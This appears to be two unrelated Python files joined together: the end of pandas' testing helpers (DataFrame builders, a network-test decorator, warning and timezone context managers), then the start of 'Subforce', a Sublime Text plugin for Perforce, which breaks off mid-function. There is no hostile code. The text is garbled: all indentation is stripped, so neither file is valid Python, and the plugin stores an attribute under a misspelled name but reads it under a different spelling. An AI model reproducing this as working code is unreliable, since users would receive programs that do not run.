def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
    Create an index/multiindex with given dimensions, levels, names, etc.
nentries - number of entries in index
    nlevels - number of levels (> 1 produces multiindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = {
"i": makeIntIndex,
"f": makeFloatIndex,
"s": makeStringIndex,
"u": makeUnicodeIndex,
"dt": makeDateIndex,
"td": makeTimedeltaIndex,
"p": makePeriodIndex,
}.get(idx_type)
if idx_func:
# pandas\_testing.py:2120: error: Cannot call function of unknown type
idx = idx_func(nentries) # type: ignore[operator]
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
# pandas\_testing.py:2148: error: Need type annotation for 'cnt'
cnt = Counter() # type: ignore[var-annotated]
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
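# Illustrative sketch (not part of the original module): makeCustomIndex can
# build flat or MultiIndex objects with generated labels. The helper name and
# the level names "outer"/"inner" are made up for the example.
def _demo_make_custom_index():
    idx = makeCustomIndex(nentries=4, nlevels=1, prefix="R", names=True)
    assert len(idx) == 4 and idx.name == "R0"
    mi = makeCustomIndex(nentries=4, nlevels=2, names=["outer", "inner"])
    assert mi.nlevels == 2 and list(mi.names) == ["outer", "inner"]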
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
    c_idx_names, r_idx_names - False/True/list of strings, yields no names,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
    # 4-level multiindex on rows with names provided, 2-level multiindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
# pandas\_testing.py:2306: error: "_create_missing_idx" gets multiple
# values for keyword argument "density" [misc]
# pandas\_testing.py:2306: error: "_create_missing_idx" gets multiple
# values for keyword argument "random_state" [misc]
i, j = _create_missing_idx( # type: ignore[misc]
*df.shape, density=density, random_state=random_state
)
df.values[i, j] = np.nan
return df
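# Illustrative sketch (not part of the original module): roughly (1 - density)
# of the generated frame's cells are set to NaN. Hypothetical helper name.
def _demo_make_missing_dataframe():
    df = makeMissingDataframe(density=0.7, random_state=42)
    n_missing = int(df.isna().sum().sum())
    # Some, but not all, cells were knocked out.
    assert 0 < n_missing < df.size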
def optional_args(decorator):
"""
allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)
"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
# pandas\_testing.py:2331: error: Incompatible types in assignment
# (expression has type "List[<nothing>]", variable has type
# "Tuple[Any, ...]")
args = [] # type: ignore[assignment]
return dec(f)
else:
return dec
return wrapper
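# Illustrative sketch (not part of the original module): a decorator wrapped
# with optional_args can be applied bare or with keyword arguments. The
# decorator and function names below are hypothetical.
@optional_args
def _demo_tagging_decorator(f, tag="default"):
    def wrapped(*args, **kwargs):
        # Return the tag alongside the wrapped function's result.
        return tag, f(*args, **kwargs)
    return wrapped
@_demo_tagging_decorator
def _demo_bare():
    return 1
@_demo_tagging_decorator(tag="custom")
def _demo_with_args():
    return 2
# _demo_bare() -> ("default", 1); _demo_with_args() -> ("custom", 2)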
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""
Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="https://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'https://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
        Any exception that has .errno or .reason.errno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
    URLError: <urlopen error unknown url type: rabbit>
You can specify alternative URLs::
>>> @network("https://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if (
check_before_test
and not raise_on_error
and not can_connect(url, error_classes)
):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
if not errno and hasattr(errno, "reason"):
# pandas\_testing.py:2521: error: "Exception" has no attribute
# "reason"
errno = getattr(err.reason, "errno", None) # type: ignore[attr-defined]
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning: Optional[Union[Type[Warning], bool]] = Warning,
filter_level="always",
check_stacklevel: bool = True,
raise_on_extra_warnings: bool = True,
match: Optional[str] = None,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
check_stacklevel : bool, default True
If True, displays the line that called the function containing
        the warning to show where the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
match : str, optional
Match warning message.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
    .. warning:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
saw_warning = False
matched_message = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if not expected_warning:
continue
expected_warning = cast(Type[Warning], expected_warning)
if issubclass(actual_warning.category, expected_warning):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
_assert_raised_with_correct_stacklevel(actual_warning)
if match is not None and re.search(match, str(actual_warning.message)):
matched_message = True
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
expected_warning = cast(Type[Warning], expected_warning)
if not saw_warning:
raise AssertionError(
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
if match and not matched_message:
raise AssertionError(
f"Did not see warning {repr(expected_warning.__name__)} "
f"matching {match}"
)
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
def _assert_raised_with_correct_stacklevel(
actual_warning: warnings.WarningMessage,
) -> None:
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[3][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
class RNGContext:
"""
    Context manager to set the numpy random number generator seed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
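# Illustrative sketch (not part of the original module): the custom dialect is
# registered only for the duration of the context. The dialect name below is
# made up.
def _demo_with_csv_dialect():
    import csv
    from io import StringIO
    with with_csv_dialect("pipes_demo", delimiter="|"):
        reader = csv.reader(StringIO("a|b|c"), dialect="pipes_demo")
        assert next(reader) == ["a", "b", "c"]
    # Outside the context, "pipes_demo" is unregistered again.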
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr.USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
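# Illustrative sketch (not part of the original module): test_parallel runs
# the decorated function once per thread; return values are discarded, so the
# body must record results via side effects. Names are hypothetical.
def _demo_test_parallel():
    results = []
    @test_parallel(num_threads=4)
    def _append_one():
        results.append(1)
    _append_one()
    # Each of the four threads appended once.
    assert len(results) == 4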
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
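# Illustrative sketch (not part of the original module): the returned wrapper
# either drops NaNs before applying `alternative`, or hands the raw values to
# `skipna_alternative`. Hypothetical helper name.
def _demo_make_skipna_wrapper():
    import numpy as np
    import pandas as pd
    s = pd.Series([1.0, np.nan, 3.0])
    dropna_sum = _make_skipna_wrapper(np.sum)
    raw_nansum = _make_skipna_wrapper(np.sum, skipna_alternative=np.nansum)
    assert dropna_sum(s) == 4.0
    assert raw_nansum(s) == 4.0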
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
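# Illustrative sketch (not part of the original module): each row is joined
# with the OS line separator and a trailing separator is appended, matching
# to_csv() output on the current platform. Hypothetical helper name.
def _demo_convert_rows_list_to_csv_str():
    import os
    expected = convert_rows_list_to_csv_str(["a,b", "1,2"])
    assert expected == "a,b" + os.linesep + "1,2" + os.linesep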
def external_error_raised(expected_exception: Type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from SelectionMixin._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : string
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
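# Illustrative sketch (not part of the original module): names are resolved on
# the operator module; an "r"-prefixed name yields a reversed-operand lambda.
# Hypothetical helper name.
def _demo_get_op_from_name():
    assert get_op_from_name("add")(2, 3) == 5
    assert get_op_from_name("__sub__")(5, 2) == 3
    assert get_op_from_name("rsub")(5, 2) == -3  # reverse op: 2 - 5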
Subforce.py
# Useful documentation:
# Sublime Plugin Framework: http://docs.sublimetext.info/en/latest/reference/plugins.html
# Sublime Plugin Python API: http://www.sublimetext.com/docs/3/api_reference.html
# Perforce API: https://www.perforce.com/perforce/r16.1/manuals/cmdref
# Perforce Python API: https://www.perforce.com/perforce/doc.current/manuals/p4script/03_python.html
# Example Plugin: https://github.com/SideBarEnhancements-org/SideBarEnhancements/blob/st3/SideBar.py
import sublime
import sublime_plugin
import P4
import os
import sys
import threading
import subprocess
import re
import tempfile
from .utilities import \
getAllViewsForPath, \
coercePathsToActiveViewIfNeeded, \
getRevisionQualifiedDepotPath, \
checkForAndGetSinglePath, \
ellipsizeIfDirectory, \
createRevision
NEW_CHANGELIST_NAME = "new"
NEW_CHANGELIST_DESCRIPTION = "Creates a new changelist."
DEFAULT_CHANGELIST_NAME = "default"
DEFAULT_CHANGELIST_DESCRIPTION = "The default changelist."
HAVE_REVISION_NAME = "have"
HAVE_REVISION_DESCRIPTION = "The currently synced revision."
HEAD_REVISION_NAME = "head"
HEAD_REVISION_DESCRIPTION = "The most recently checked-in revision."
FILE_CHECKED_OUT_SETTING_KEY = "subforce_file_checked_out"
FILE_NOT_IN_DEPOT_SETTING_KEY = "subforce_file_not_in_depot"
CHANGELIST_NUMBER_STATUS_KEY = "subforce_changelist_number"
CURRENT_WORKING_DIRECTORY_SETTING_KEY = 'current_working_directory'
DISPLAY_WARNINGS_SETTING_KEY = 'display_warnings'
USE_CONNECTION_INFO_SETTINGS_KEY = 'use_connection_info'
CONNECTION_INFO_PORT_SETTINGS_KEY = 'connection_info_port'
CONNECTION_INFO_USER_SETTINGS_KEY = 'connection_info_user'
CONNECTION_INFO_CLIENT_SETTINGS_KEY = 'connection_info_client'
DISABLE_AUTO_CHECKOUT_SETTINGS_KEY = 'disable_auto_checkout'
class SettingsWrapper(object):
def __init__(self):
self._settings = sublime.load_settings("Subforce.sublime-settings")
def __getattr__(self, name):
return getattr(self._settings, name)
def getOrThrow(self, name):
setting = self._settings.get(name)
if setting is None:
raise P4.P4Exception("Subforce: You must set the {} setting!".format(name))
return setting
class PerforceWrapper(object):
def __init__(self, squelchErrorAndWarninMessages=False):
self._p4 = P4.P4()
self._settings = SettingsWrapper()
currentWorkingDirectorySetting = self._settings.get(CURRENT_WORKING_DIRECTORY_SETTING_KEY, None)
projectPath = sublime.active_window().extract_variables()['folder']
self._p4.cwd = currentWorkingDirectorySetting if currentWorkingDirectorySetting else projectPath
self._p4.exception_level = 1 # Only errors are raised as exceptions. Warnings are accessed through p4.warnings
self._p4.api_level = 79 # Lock to 2015.2 format
self._contextManagerEnterLevel = 0
self._squelchErrorAndWarninMessages = squelchErrorAndWarninMessages
def __getattr__(self, name):
attribute = getattr(self._p4, name)
return attribute
def __enter__(self):
if self._contextManagerEnterLevel == 0:
try:
if self._settings.get(USE_CONNECTION_INFO_SETTINGS_KEY, False):
self._p4.port = self._settings.getOrThrow(CONNECTION_INFO_PORT_SETTINGS_KEY)
self._p4.user = self._settings.getOrThrow(CONNECTION_INFO_USER_SETTINGS_KEY)
self._p4.client = self._settings.getOrThrow(CONNECTION_INFO_CLIENT_SETTINGS_KEY)
self._p4.connect()
except:
if self.__exit__(*sys.exc_info()):
pass
else:
raise
self._contextManagerEnterLevel += 1
return self
def __exit__(self, type, value, traceback):
noErrors = True
if self._contextManagerEnterLevel == 1:
self.handleWarnings()
try:
self._p4.disconnect()
except P4.P4Exception:
print("Subforce: failed to disconnect!")
noErrors = self.handleErrors(type, value, traceback)
self._contextManagerEnterLevel -= 1
return noErrors
def login(self, password):
self._p4.password = password
with self as p4:
p4.run_login()
print("Subforce: sucessfully logged in!")
def handleWarnings(self):
displayWarningsSetting = self._settings.get(DISPLAY_WARNINGS_SETTING_KEY, True)
if not self._squelchErrorAndWarningMessages and displayWarningsSetting:
for warning in self._p4.warnings:
sublime.message_dialog(str(warning))
def handleErrors(self, type, value, traceback):
noErrors = True
if type is P4.P4Exception:
if not self._squelchErrorAndWarningMessages:
sublime.error_message(str(value))
noErrors = False
elif type is not None:
noErrors = False
else:
noErrors = True
return noErrors
def pathUnderRoot(self, path):
try:
stat = self._p4.run_fstat(path)
# Sometimes an empty array is returned instead of an exception
if stat:
return True
else:
return False
except P4.P4Exception:
return False
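# Usage sketch (illustrative, not part of the original plugin): PerforceWrapper is a
# re-entrant context manager; the connection is opened only when the outermost "with"
# is entered and closed when it exits, with warnings and errors routed to dialogs.
# Here some_path is a placeholder for a real workspace path:
#   with PerforceWrapper() as p4:
#       if p4.pathUnderRoot(some_path):
#           stat = p4.run_fstat(some_path)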
def plugin_loaded():
print("Subforce: plugin loaded!")
def plugin_unloaded():
print("Subforce: plugin unloaded!")
class SubforceDisplayDescriptionCommand(sublime_plugin.TextCommand):
def run(self, edit, description = ""):
# Enable editing momentarily to set description
self.view.set_read_only(False)
self.view.replace(edit, sublime.Region(0, self.view.size()), description)
self.view.sel().clear()
self.view.set_read_only(True)
class DescriptionOutputPanel(object):
_outputPanelName = 'description_output_panel'
_qualifiedOutputPanelName = 'output.description_output_panel'
_outputPanelCreationLock = threading.Lock()
def __init__(self, window):
self._outputPanelCreationLock.acquire(blocking=True, timeout=1)
self._window = window
self._descriptionOutputPanel = self._window.find_output_panel(self._outputPanelName)
if not self._descriptionOutputPanel:
self._descriptionOutputPanel = self._window.create_output_panel(self._outputPanelName, True)
self._descriptionOutputPanel.settings().set("is_description_output_panel", True)
self._outputPanelCreationLock.release()
def show(self, description):
self._window.run_command(
"show_panel",
{
"panel": self._qualifiedOutputPanelName
}
)
self._descriptionOutputPanel.run_command(
"subforce_display_description",
{
"description": description
}
)
def hide(self):
self._window.run_command(
"hide_panel",
{
"panel": self._qualifiedOutputPanelName,
"cancel": True
}
)
class ChangelistManager(object):
def __init__(self, window, perforceWrapper):
self._window = window
self._perforceWrapper = perforceWrapper
self._changelistDescriptionOutputPanel = DescriptionOutputPanel(self._window)
def viewAllChangelists(self, onDoneCallback, includeNew=False, includeDefault=False):
with self._perforceWrapper as p4:
changelists = []
if includeNew:
changelists.append({"change": NEW_CHANGELIST_NAME, "desc": NEW_CHANGELIST_DESCRIPTION})
if includeDefault:
changelists.append({"change": DEFAULT_CHANGELIST_NAME, "desc": DEFAULT_CHANGELIST_DESCRIPTION})
changelists.extend(p4.run_changes("-c", p4.client, "-s", "pending", "-l"))
def onCreatedChangelist(number):
if onDoneCallback and number:
onDoneCallback(number)
SubforceStatusUpdatingEventListener.updateStatus(self._window.active_view())
def onDone(selectedIndex):
